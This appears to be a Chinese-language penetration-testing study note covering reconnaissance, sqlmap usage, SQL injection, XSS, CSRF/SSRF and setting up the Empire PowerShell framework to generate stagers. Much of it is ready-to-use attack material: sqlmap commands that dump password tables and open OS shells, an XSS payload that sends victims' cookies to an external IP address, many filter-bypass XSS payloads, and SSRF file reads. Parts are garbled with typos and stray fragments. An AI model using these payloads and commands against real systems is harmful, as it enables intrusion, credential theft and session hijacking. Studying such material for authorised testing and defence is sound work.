在进行目标渗透测试之前,最重要的一步就是收集信息,在这阶段要尽可能的收集目标的信息对目标了解的越多,之后进行的测试就越容易。
信息收集的一般方法
一. Whois查询
1.1whois是一个标准的互联网协议,在3whois查询中,能找到很多跟域名有关的信息,例如域名注册时间,域名所有人,一般的小型网站域名所有人是网站管理员。
常用的查询网址有爱站(https://whois.aizhan.com)站长之家(http://whois.chinaz.com)和Virus Total(https://www.virustotal.com)
2. 通过搜索引擎收集敏感信息
2.1 Google是世界上最强的搜索引擎之-对一位渗透测试者而言,它可能是款绝住的黑客工具,我们可以通过构造特殊的关键字语法来搜索互联网上的相关敏感信息。如inurl:bbs 冰墩墩,冰墩墩 inurl:bbs根据文件类型搜索关键词+空格+filetype+ :+文件类型比如:专升本 filetype:DOC(搜索专插本的有关文档),专升本 filetype:pdf,info招生录取 www.zzcsjr.edu.cn
3. 收集子域名信息
3.1子域名也就是二级域名,是指顶级域名下的域名。一般其主域都是重点防护区域,所以不如先进入目标的某个子域,然后再想办法迁回接近真正的目标这无疑是个比较好的选择。收集域名信息有以下常用的方法
1子域名检测工具用于子域名检测的工具主要有Layer子域名挖掘机、K8、wydomain、subDomainsBrute、MaltegoCE等
2搜索引擎枚举,直接搜索子域名
3 第三方聚合应用枚举很多第三方服务汇聚了大量DNS数据集,可通过它们检索某个给定域名的子域名。只需在其搜索栏中输入域名,就可检索到相关的域名信息
4. 收集常用的端口信息
4.1收集在渗透测试的过程中,对端口信息的收集是一个很重要的过程,通过扫描服务器开放的端口以及从该端口判断服务器上存在的服务,就可以对症下药,便于我们渗透目标服务器,我们需要关注常见应用的默认端口和在端口上运行的服务,最常见的扫描工具就是Nmap,x-scan
2.常用的各种端口
Web应用服务端口
端口号:80/443/8080 端口说明:常见的Web服务端口 攻击方向:Web 攻击、爆破、对应服务器版本漏洞
端口号:7001/7002端口说明: WebLogic 控制台 攻击方向: Java反序列化、弱口令
端口号:8080/8089端口说明: Jboss/Resin/Jetty/Jenkins攻击方向:反序列化、控制台弱口令
端口号:9090 端口说明:WebSphere 控制 攻击方向:Java反序列化、弱口令
端口号:4848 端口说明:GlassFish 控制台 攻击方向:弱口令
端口号:1352 端口说明:Lotus domino邮件服务 攻击方向:弱口令、信息泄露、爆破
端口号:10000 端口说明:Webmin-Web 控制面板 攻击方向:弱口令
数据库服务端口
端口号
端口号 3306 端口说明MySQL 攻击方向 注入、提权、爆破
端口号 1433 端口说明MSSQL 数据库 攻击方向注入、提权、SA弱口令、爆破
端口号 1521 端口说明Oracle 数据库 攻击方向 TNS 爆破、注入、反弹 Shell
端口号 5432 端口说明PostgreSQL数据库 攻击方向 爆破、注入、弱口令
端口号 27017/27018 端口说明 MongoDB 攻击方向 爆破、未授权访问
端口号 6379 端口说明Redis数据库攻击方向 可尝试未授权访问、弱口令爆破
端口号 5000 端口说明SysBase/DB2数据库 攻击方向 爆破、注入
文件共享服务端口
端口号 21/22/69 端口说明 Ftp/Tftp文件传输协议 允许匿名的上传、下载、爆破和嗅探操作
端口号 2049 端口说明 Ns服务 攻击方向 端口说明配置不当
端口号 139 端口说明 Samba服务 攻击方向 爆破、未授权访问、远程代码执行
端口号 389 端口说明 Ldap目录访问协议 攻击方向 注入、允许匿名访问、弱口令
远程连接服务端口
端口号 22端口说明 SSH远程连接 攻击方向 爆破、SSH 隧道及内网代理转发、文件传输
端口号 23 端口说明 Telnet远程连接 攻击方向 爆破、嗅探、弱口令
端口号 3389 端口说明 Rdp远程桌面连接攻击方向 Shift后门(需要Windows Server 2003以下的系统)、爆破
端口号 5900 端口说明 VNC 攻击方向 弱口令爆破
端口号 5632 端口说明 PyAnywhere服务 攻击方向 抓密码、代码执行
邮件服务端口
端口号 25 端口说明 SMTP 攻击方向 邮件服务 邮件伪造
端口号 110 端口说明 POP3协议 攻击方向 爆破、嗅探
端口号 143 端口说明 IMAP协议 攻击方向 爆破
网络常见协议端口
端口号 53 端口说明 DNS域名系统 攻击方向 允许区域传送、DNS劫持、缓存投毒、欺骗
端口号 67/68 端口说明 DHCP服务 攻击方向 劫持、欺骗
端口号 161 端口说明 SNMP协议 攻击方向 爆破、搜集目标内网信息
特殊服务端口
端口号 2181 端口说明 Zookeeper服务 攻击方向 未授权访问
端口号 8069 端口说明 Zabbix服务 攻击方向 远程执行、SQL注入
端口号 9200/9300 端口说明 Elasticsearch 服务 攻击方向 远程执行
端口号 11211 端口说明 Memcache服务 攻击方向 未授权访问
端口号 512/513/514 端口说明 Linux Rexec服务 攻击方向 爆破、Rlogin 登录
端口号 873 端口说明 Rsync 服务 攻击方向 匿名访问、文件上传
端口号 3690 端口说明 Svn服务 攻击方向 Svn 泄露、未授权访问
端口号 50000 端口说明 SAP Management Console 攻击方向远程执行
5.指纹识别
指纹由于其终身不变性、唯一性和方便性,几乎已成为生物特征识别的代名词。通常我们说的指纹就是人的手指末端正面皮肤上凸凹不平的纹线,纹线规律地排列形成不同的纹型。而本节所讲的指纹是指网站CMS指纹识别、计算机操作系统及Web容器的指纹识别等。应用程序一般在html、js、css等文件中多多少少会包含一些特征码,比如WordPress在robots.txt中会包含wp-admin、首页indexphp中会包含generator-wordpress 3.xx,这个特征就是这个CMS的指纹,那么当碰到其他网站也存在此特征时,就可以快速识别出该CMS,所以叫作指纹识别。在渗透测试中,对目标服务器进行指纹识别是相当有必要的,因为只有识别出相应的Web容器或者CM语能查找与其相关的漏洞,然后才能进行相应的渗透操作。
CMS(Conkent ManagementSystem)又称整站系统或文章系统。在2004年以前,如果想进行网站内容管理,基本上都靠手工维护,但在信息爆炸的时代,完全靠手工完成会相当痛苦。所以就出现了CMS,开发者只要给客户一个软件包,客户自己安装配置好,就可以定期更新数据来维护网站,节省了大量的人力和物力。
常见的CMS有Dedecms(织梦)、Discuz、PHPWEB.PHPWind、PHPCMS.ECShop、 Dvbbs、SiteWeaver、ASPCMS、帝国、Z-Blog·(WordPrest等。代表工具有御剑Web指纹识别、WhatWeb、WebRobo、椰树、轻量WEB指纹识。除了这些工具,读者还可以利用一些在线网站查询CMS指纹识别,如下所示。云悉指纹:http://www.yunsee.cn/finger.html。 BugScaner:http://whatweb.bugscaner.com/look/和WhatWeb:https://whatweb.net/。
6.查找真实IP allow:/ disallow luccenter
在渗透测试过程中,目标服务器可能只有一个域名,那么如何通过这个域名来确定目标服务器的真实IP对渗透测试来说就很重要。如果目标服务器不存在CDN,可以直接通过wwwip138.com获取目标的一些IP及域名信息。这里主要讲解在以下这几种情况下,如何绕过CDN
7.社会工程学
社会工程学在渗透测试中起着不小的作用,利用社会工程学,攻击者可以从一名员工的口中挖掘出本应该是秘密的信息。
8.判断目标是否使用了CDN
通常会通过ping目标主域,观察域名的解析情况,以此来判断其是否使用了CDN。
还可以利用在线网站17CE(https://www.17ce.com)进行全国多地区的ping服务器操作,然后对比每个地区ping出的IP结果,查看这些IP是否一致,如果都是一样的,极有可能不存在CDN。如果IP大多不太一样或者规律性很强,可以尝试查询这些IP的归属地,判断是否存在CDN。
9.目标服务器存在CDN
CDN即内容分发网络,主要解决因传输距离和不同运营商节点造成的网络速度性能低下的问题。说得简单点,就是一组在不同运营商之间的对接节点上的高速缓存服务器,把用户经常访问的静态数据资源(例如静态的html、css、js图片等文件)直接缓存到节点服务器上,当用户再次请求时,会直接分发到在离用户近的节点服务器上响应给用户,当用户有实际数据交互时才会从远程Web服务器上响应,这样可以大大提高网站的响应速度及用户体验。所以如果渗透目标购买了CDN服务,可以直接ping目标的域名,但得到的并非直正的目标Web服务器,只是离我们最近的一台目标节点的CDN服务器,这就导致了我们没法直接得到目标的真实IP段范围。
sqlmap支持五种不同的注入模式:
UNION query SQL injection(可联合查询注入)
uError-based SQL injection(报错型注入)
uBoolean-based blind SQL injection(布尔型注入)
uTime-based blind SQL injection(基于时间延迟注入)
uStacked queries SQL injection(可多语句查询注入)
2.sqlmap 常用命令参数
-u /--url 最基本格式 sqlmap -u “XXXXXXXXXXXXX/index.pho?id=1”
-m 从文本中获取多个目标扫描,但是每一个一个url. sqlmap -m urllist.txt
-r 从文件中加载HTTP请求,这样的话就不需要再去设定cookie,POST数据….
--dbs 返回当前连接的数据库
--current-db 返回当前网站数据库的数据库用户
-D 指定数据库系统的数据库名
--tables 列举数据库表
-T 指定数据库表名
--columns 列举数据库表中的字段
-C 指定数据库表中的字段名
--dump 获取整个表的数据
3.设置回显等级
参数: -v默认为1
0 只显示python错误以及严重的信息
1 基本信息和警告信息
2 debug信息
3 注入的payload
(级别越高显示信息越多)
4同时显示HTTP请求。
5同时显示HTTP响应头。
6同事显示HTTP响应页面。
--data 把数以post方式提交,sqlmap会像检测GET参数一样检测POST过去的参数。
--cookie (用于区分用户)
可能会有漏洞,当web登录时,抓取数据包。
4.设置HTTP数据包相关参数
HTTP User-Agent 头
参数:--random-agent 会从sqlmap/txt/user-agents.txt中随机产生User-Agent头。
sqlmap -u “http://www.target.com” --level 3 --andom-agent --dbs
sqlmap 检查uesr-agent中的注入点, level>=3才会去检查user-agent头是否存在注入漏洞
5.设定探测等级:--level
共有五个等级 默认为1 sqlmap使用的payload可以在xml/payloads.xml中看到
--users 列数据库管理用户
--current-user 在数据库中,目前连接的用户
--is-dba 判断当前是否为管理,是的话返回true
--proxy 指定一个代理服务器 eg: -proxy http://xxxxxx.8080
--os-shell 前提:需要网站的物理路径,其次是需要有FIILE权限
6.Sqlmap“六步”
第一步:判断是否注是注入点
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)”
检测该网站是否存在漏洞 白色加粗字体为注入点 也就是攻击对象
第二步:获取数据库
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)” –dbs
第三步:查看当前应用程序所用数据库
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)” --current-db
四:列出指定数据库的所有表
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)” -D”security(目标数据库)”—tables
五:读取指定表中的字段名称
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)” -D”security”-T users –colunms
六:读取指定字段内容
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)” -D”security”-T users -C username,password –dump(dump=下载,脱库)
判断当前数据库用户权限:
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)” --is-dba
如果是TRUE ,那么权限该用户很大。
-roles 列出数据库管理员角色
如果当前用户有权限读取包含所有用户的表,输入该命令会列举出每个用户的角色,
sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --roles
-referer HTTPReferer头
当–level参数设定为3或3以上时,会尝试对HTTP Referer注入。可以使用referer命令来欺骗,如--referer https://mp.mysite.net
-sql-shell 运行自定义的sql语句
sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --sql-shell
运行任意操作系统命令:
选择后台语言
sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --os-cmd=whoami
--os-cmd=whoami
--os-shell
(以你的电脑为跳板,对局域网进行渗透,或留后门)
--file-read 从数据库服务器中读取文件 :当前用户有权限使用特定的函数时,读取的文件可以是文本,也可以是二进制文件。
上传文件到数据库服务器中:
--file-write
--file-dest
读取指定数据库用户的密码
sqlmap -u "http://xxxxx/fuzz/index.php?id=1" --passwords -U root
SQLMAP进阶 常用tamper脚本
apostrophemask.py 将引号替换为utf-8,用于过滤单引号 (易容术)
适用数据库:ALL
作用:将引号替换为utf-8,用于过滤单引号
使用脚本前:tamper("1 AND '1'='1")
使用脚本后:1 AND %EF%BC%871%EF%BC%87=%EF%BC%871
multiplespaces.py 围绕sql关键字添加多个空格 去绕过
适用数据库:ALL
作用:围绕sql关键字添加多个空格
使用脚本前:tamper('1 UNION SELECT foobar')
使用脚本后:1 UNION SELECT foobar
3. Burp Suite工具
一.配置及代理设置
1.使用前配置
①选择代理Proxy选项卡
②选择设置option选项卡
③Edit Running打勾 124.0.0.1:8080
配置成功
历史访问
二.功能模块讲解
模块介绍
send to spider 发送给爬虫模块
do a active scan 进行一次主动扫描
send to intruder 发送给爆破模块
send to repearter 发送给重放模块
send to comparer 发送给比对模块
send to decoder 发送给解码模块
request in browser 将请求在浏览器重放
四:MYSQL与SQL注入
mysql知识点- 基本查询语句
查询表中全部信息: select *from 表明-关键的函数
select+以下语句
version() 数据库版本
database() 数据库名
user() 用户名
current_user() 当前用户名
system_user() 系统用户名
@@datadir 数据库路径
@@version_compile_os 操作系统版本
-order by(排序) 语法
-联合查询
order by 1—
order by 2—确定字段数
使用UNION操作符注入另外一个select查询,并将查询结果附加在第一次查询结果之后。第二次查询能够从另外一个完全不同的数据库表中提取数据
注意: 相同的列结构
需要有知道表结构,列结构
exists()函数猜解表明
information_schema 是一个mysql系统自带的元数据库
information_schema.SCHEMATA 查看所有的数据库
五、 XSS基础
1、什么是XSS?
中文名为跨站脚本攻击,跨站脚本,(Cross-Site Scripting, XSS),当目标网站用户在渲染HTML文档的过程中,出现非预期的脚本指令并执行时,XSS就发生了。
2、攻击者给予应用恶意XSS代码,导致用户访问应用或服务器时执行代码,导致被XSS攻击。
攻击者→服务器→用户(xss是一种迫使Web站点回显可执行代码的攻击技术,而这些可执行代码由攻击者提供、最终为用户浏览器加载)
3、XSS的危害: 1.网络钓鱼,包括盗取各类用户的账号
2.窃取用户cookies资料,从而获取用户信息。
3.获取客户端信息,IP/端口等
4.劫持用户浏览器会话,从而执行任意操作
5.强制弹出窗口。
6.网页挂马,进行恶意操作
7.进行大量的客户端攻击 如DDoS攻击
8.控制受害者机器向其他客户端攻击
4、XSS分类
①反射型 :非持久型,调取用户cookie或者进行钓鱼,常常为通过引诱用户点击一个恶意链接来实施攻击。
(特点:
① 主要用于将恶意脚本附加到URL地址的参数中
② 只在用户单击url时触发,而且只执行一次,非持久化
③常用来窃取客户端 Cookies
或进行钓鱼欺骗.
④常常为通过引诱用户点击一
个恶意链接来实施攻击的)
name为可控参数
我们可以通过执行恶意代码弹窗,那么也能做些对我们有利的事情。
当我们构造好了如下恶意代码,发送给受害者。
<script>alert(document.cookie)</script>
将会弹出用户的cookie值,我们构造js代码,将该cookie值发送至我们自己的服务器,或者用XSS平台接收该cookie(例如https://xsshs.cn/),我们就能通过该cookie非法登录受害者的账户。
②存储型 :渗透 挂马 蠕虫病毒 出现在网站的留言、评论、日志等交互处,被存储在数据库或者客户端中,等再次浏览时受到攻击。
(特点:① 恶意代码被保存到目标网站的服务器中,每次用户访问时都会执行脚本代码,这种攻击具有较强的稳定性和持久性
② 比反射型跨站脚本更具威胁性,并且可能影响到Web服务器自身的安全.
③ 一般出现在网站的留言、评论、日志等交互处,)
页面原理:
POST提交数据,生成、读取文本模拟数据库,
提交数据之后页面会将数据写入sql.txt,
再打开页面时会读取sql.txt中内容并显示在网页上,
实现了存储型xss攻击模拟。
当输入恶意代码,即会执行<script>alert('xss')</script>
并且恶意代码会一直存储在服务器,每当有用户访问该页面,即会触发恶意代码
利用XSS弹出恶意警告框
<script>alert('hacked by cl4y')</script>
网页不停刷新
<meta http-equiv= 'refresh' content= '0' > http://192.168.127.1/ctfteach/demo/xss/reflect_xss.php?name=<meta httpequiv= 'refresh' content= '0' >
获得cookie
<script>window.location.href='http://118.25.14.40:8200/?cookie='+document.cookie</script>
劫持流量(跳转到你的博客强行吸粉)
<script>window.location.href="http://www.cl4y.top";</script>
③dom型: 将XSS代码嵌入dom文档(每一个网页),通过JS脚本对文档对象进行编辑从而修改页面元素,增加漏洞。
xss平台
1.获取COOKIE(这是必须的最基本的功能)
2.获取源码(取当前网页的源码)
3.截图(可自己修改为连续截图)
4.……………
https://xss.pt
https://xssaq.com
XSS利用——无任何过滤
<scirpt>
<scirpt>alert(1);</script>
<img>
<img src=1 οnerrοr=alert("xss");> //onerror等事件,可以调用js
<input>
<input οnfοcus="alert('xss');" autofocus>
<svg>
<svg οnlοad=alert("xss");>
<iframe>
<iframe οnlοad=alert("xss");></iframe>
<iframe src=javascript:alert('xss');></iframe> //src中支持伪协议
<textarea>
<textarea οnfοcus=alert("xss"); autofocus>
往往用户可控的参数都进行了过滤,不会让你用一个<script>标签就轻易攻击成功
<script>shellcode</script>
XXS绕过:
关键字绕过
空格绕过
用/代替空格 <img/src="x"/οnerrοr=alert("xss");>
关键字绕过
大小写绕过 <ImG sRc=x onerRor=alert("xss");>
利用其他标签
双写关键字 <imimgg srsrcc=x οnerrοr=alert("xss");>
字符拼接 <img src="x" οnerrοr="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">
<script>top["al"+"ert"](`xss`);</script>
利用函数进行编码绕过
Unicode绕过
<img src="x" οnerrοr="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')"> 利用函数进行编码绕过
ASCII码
<img src="x" οnerrοr="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">
Hex绕过
<img src=x οnerrοr=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>
Base64编码
<img src="x" οnerrοr="eval(atob('YWxlcnQoJ3hzcycp'))">
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
过滤括号
当括号被过滤的时候可以使用throw来绕过
<svg/οnlοad="window.οnerrοr=eval;throw'=alert\x281\x29';"> //异常处理
反引号
<img src=x οnerrοr=alert`1`>
过滤双引号,单引号
反引号
<img src=1 οnerrοr=alert`1`;>
js事件
当某个位置的可控点在一个标签内,那么或许可以通过js事件来完成xss操作
<img src=1 οnerrοr=alert`1`;>
混淆:
利用html标签格式的不严格、容错性。
关键字中加空格
加TAB
回车
url编码
<img src="x" οnerrοr="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
六.Cref漏洞
1,漏洞介绍: 一种对网站的恶意使用。与 xss相比不大流行(因此对其防范相当稀少,比xss更加具有危险性。
原理:利用目标用户身份,以目标用户名义执行非法操作(以目标用户名义发邮件,消息,盗取目标账号,购买商品,虚拟货币转账等),会泄露目标用户的财产安全。
Ps:(CSRF漏洞经常用来制作蠕虫攻击,刷SEO流量)
靶场实战:漏洞分析:
:
Ssrf漏洞:是一种由攻击者构造请求,由服务器发起请求的安全漏洞。与csrf最大的区别是一个是服务器,一个是由客户端发起的。
在域名后增加url=语句,从而利用ssrf漏洞篡改脚本访问的地址。
攻击方式如下:
A,对外网,服务器所在的内网,本地进行端口扫描,获取的banner信息。
B,攻击运行在内网或本地的应用程序。
C,对内网web应用进行指纹识别,识别企业内部的资产信息。
D.攻击内外网的web应用,主要是用HTTP请求就可以实现的攻击(比如struts2,sqli
等等)
E,利用file协议读取本地文件。
SSRF漏洞利用:
测试地址:http://127.0.0.1.1/ssrf.php?Url=http:127.0.0.7/2.php
页面ssrf.php实现的功能获取GET参数URL,然后将url的内容返回网页上。
如果将请求的网址篡改为http://www.baidu.com,则会显示http://www.baidu.com的网页内容,但是,当设置参数URL为内网地址时,则会泄露内网信息。
访问ssrf.php?Url=file://C:/wwindows/win.ini即可读取本地文件。
Ssrf漏洞修复建议:
,限制请求的端口只能为web端口,只允许访问HTTP和HTTPS的请求。
限制不能访问的内网ip,以防止对内网进行攻击。
屏蔽返回的详细信息。
七,Empire
Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测和大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。
Empire运行在linux平台上
官方下载地址,不过很久没有更新,需要Python 2.6/2.7环境
https://github.com/EmpireProject/Empire
KALI示例:
git clone https://github.com/EmpireProject/Empire.git
然后安装Empire的依赖,命令如下
cd Empire
cd setup
pip install -r requirements.txt(若没有安装pip库,则需要先通过apt-get install pip进行安装)
./install.sh
在安装完依赖以后,返回上一级文件,启动Empire工具,命令如下:
cd ..
./empire
若启动失败,则可能是因为依赖未完全安装好,只需要手动通过pip install xxx安装未安装好的依赖即可。
启动时如果遇到如下报错
可以将urllib3版本降级
pip install urllib3==1.22
重新设定
bash reset.sh
基本使用会涉及如下内容:
1.帮助文档
2.设置监听
3.生成木马
4.连接主机和基本使用
5.信息收集
6.权限提升
帮助文档
运行Empire后,输入help命令查看具体的使用帮助。
设置监听步骤如下:
listeners #进入监听线程界面
uselistener #设置监听模式
info #查看具体参数设置
set #设置相应参数
execute #开始监听
输入Listeners命令进入监听界面,按TAB键可以补全命令,按两次TAB键或者help可以显示可以利用的模块
输入uselistener来设置采用何种监听模式,双击TAB可以看到有以下可以使用的模式。
设置监听
这里采用http监听模式,输入uselistener http。
然后输入info命令查看具体参数设置。其中Require为True的值都需要被设置。
通过set配置参数,并提供execeute执行,需要注意的是Empire不同于Metasploit,Empire命令是区分大小写的
通过back返回上一级,使用listeners或者list可以查看所设置的监听器
生成木马
输入usestager后 空格加TAB键 查看可以设置的木马模式
木马就类似Metasploit中的payload,其中multi为通用模块,osx是Mac操作系统的模块,剩下的是Windows的模块。
我们以 windows/launcher_bat为例,给大家说下过程,其他的使用都类似
要使用launcher_bat,首先输入usestager windows/launcher_bat,然后输入info命令查看详细参数
通过set配置参数,我们需要设置一个 Listener 参数,即监听的名字(前面我们给监听起得一个名字test1),通过execeute执行,
文件会生成到 tmp 目录下,如下所示在目标主机上运行生成的launcher.bat,输入 agents 可以查看已经获得的会